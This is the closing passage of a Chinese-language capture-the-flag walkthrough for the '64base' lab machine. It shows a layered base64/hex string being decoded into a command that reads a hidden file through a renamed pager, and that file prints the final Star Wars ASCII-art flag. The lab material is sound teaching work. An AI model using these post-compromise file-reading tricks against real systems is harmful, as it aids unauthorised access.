     root@kali:~# echo "NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK" |base64 -d|xxd -p -r|base64 -d|xxd -p -r|base64 -d
 base64 -d /var/local/.luke|less.real

    解碼結果為 base64 -d /var/local/.luke|less.real,執行命令

     64base@64base:/tmp$ base64 -d /var/local/.luke|less.real
   ______  ______  ______  ______  ______  ______  ______  ______
  |______||______||______||______||______||______||______||______||______|
  __          __  _ _   _____
          \ \        / / | | | |  __ \
           \ \  /\  / /__| | | | |  | | ___  _ __   ___
            \ \/  \/ / _ \ | | | |  | |/ _ \| '_ \ / _ \
             \  /\  /  __/ | | | |__| | (_) | | | |  __/
          __  \/ _\/ \___|_|_|_|_____/ \___/|_|_|_|\___| _
          \ \   / /          |  __ \(_)   | | |_   _| | | |
           \ \_/ /__  _   _  | |  | |_  __| |   | | | |_| |
            \   / _ \| | | | | |  | | |/ _` |   | | | __| |
             | | (_) | |_| | | |__| | | (_| |  _| |_| |_|_|
             |_|\___/ \__,_| |_____/|_|\__,_| |_____|\__(_)
 
 _____ _ _ _ __ __ __  _ ___ _   __  ___  __ __  __  _  ___ _ _  __ _________
 %=x%= | |V| |_)|_ |_) | |_| |   |_) |_| (_  |_  |_) |  |_| |\| (_  %=x%=x%=x
 ~~~~~ | | | |  |_ | \ | | | |_  |_) | | __) |_  |   |_ | | | | __) ~~~~~~~~~
 LS
                  .-. .-.
                .=========.         E x t e r i o r ,   A e r i a l   V i e w
                ||.-.7.-.||         -----------------------------------------
                ||`-' `-'||
                `========='
                 `-'| |`-'8               1 .............. Sensor Suite Tower
           ______   |9|   ______          2 ... Heavy Twin Turbolaser Turrets
          /     /\__| |__/\     \         3 ............. Heavy Laser Turrets
         /  \_ / /  |_|  \ \ _/  \        4 ....... TIE Fighter Launch Chutes
        /___(\\\/         \///)___\       5 ............... Heavy Blast Doors
        \____\\`==========='//____/       6 .................... Guard towers
        /     '/ .-------. \\     \       7 ........ Shuttle Landing Platform
     __/     //. \`+---+'/ .\\     \__    8 ........... AT-AT Docking Station
    /\ \    ///x`.\|___|/.'x\\\    / /\   9 ................. Connecting Ramp
   /  \ \  //`-._//|   |\\_.2'\\  / /  \
  /  _.-==='_____//.-=-.\\_____`===-._  \
  \   `-===.\-.  \ `-=1' /  .-/.===-' 3 / The pre-fabricated,  multi-function
   \  / /  \\\ \  \.===./  /4///  \ \  /  Imperial garrison base is the back-
    \/_/    \\\ | /.---.\ | ///    \_\/   bone of the  Empire's  occupational
       \     \\\|/ |_m_| \|///     /      forces. These heavily-armoured for-
        \_____\=============/_____/       tresses have  walls up to 10 meters
        /____///    ___    \\\____\       thick  to  guard   against   ground
        \   (_//\__|||||__/\\_)   /       assaults,  and  powerful  deflector
         \  /  \|,,|||||,,|/  \  /        shields  protect  them  for  air or
          \_____|  | 5 | 6|_____/         space attacks.

    至此,已完成。

相關文章